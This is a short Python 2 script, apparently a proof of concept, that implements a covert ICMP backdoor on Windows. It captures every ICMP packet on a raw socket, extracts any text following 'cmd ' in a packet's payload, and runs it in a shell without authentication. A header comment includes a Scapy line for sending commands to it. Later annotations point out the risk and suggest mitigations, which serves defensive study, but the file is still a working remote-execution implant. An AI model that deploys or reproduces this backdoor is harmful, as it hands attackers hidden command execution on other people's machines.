#!/usr/bin/python
#Written by demonalex on Oct 1, 2016
#PoC with Scapy: send(IP(dst="192.168.0.3")/ICMP()/"cmd echo 1 > c:\test.txt")
import socket, re, sys, subprocess
host = socket.gethostname()
# Raw ICMP socket bound to this host's primary address. IP_HDRINCL keeps the IP
# header in received data; SIO_RCVALL switches the interface into capture-all
# mode (Windows-only; raw sockets need administrator rights). A process turning
# this mode on is itself a high-signal event for endpoint detection.
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.bind((host,0))
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
s.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
# Receive loop: there is no break, so the RCVALL_OFF call below is unreachable.
while 1:
# receive one packet; recvfrom returns a (data, address) tuple
icmp_packet = s.recvfrom(65535)
# str() of the whole tuple, e.g. "('<data>', ('<addr>', 0))"; the regex below
# relies on that textual form rather than on the packet layout
ipacket=str(icmp_packet)
#print type(ipacket), ":", ipacket
try:
# capture everything after "cmd " up to the "', ('" that separates the data
# string from the address tuple in str(); case-insensitive (re.I)
matchstr = re.search(r'cmd (.*)\', \(\'', ipacket, re.M|re.I)
if matchstr:
#print matchstr.group(1)
command = matchstr.group(1)
# Risk: the captured text comes straight from an unauthenticated ICMP payload
# and is handed to the shell unchanged (shell=True); the sender address in
# icmp_packet[1] is never checked and there is no allow-list. The command's
# output is discarded. Mitigation: filter ICMP at the host firewall and block
# raw-socket / capture-all use by non-approved processes.
subprocess.check_output(command, shell=True)
#print "Executed \'", command, "\'"
except:
# bare except: swallows every error (KeyboardInterrupt included) and keeps looping
print "Execution failed."
continue
# disable capture-all mode (unreachable: the loop above has no exit path)
s.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)